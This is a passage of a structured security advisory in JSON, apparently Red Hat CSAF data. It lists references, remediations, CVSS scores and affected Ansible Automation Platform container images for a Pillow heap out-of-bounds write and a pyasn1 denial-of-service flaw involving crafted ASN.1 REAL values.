"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
},
{
"cve": "CVE-2026-59886",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-14T17:01:19.689422+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500041"
}
],
"notes": [
{
"category": "description",
"text": "A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in pyasn1, rated as Important, could lead to a denial of service in Red Hat products that process untrusted ASN.1 data. A remote attacker could send a specially crafted BER, CER, or DER encoded REAL value with a large exponent, causing applications to consume excessive resources during decoding operations such as printing, logging, or arithmetic, thereby rendering the service unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
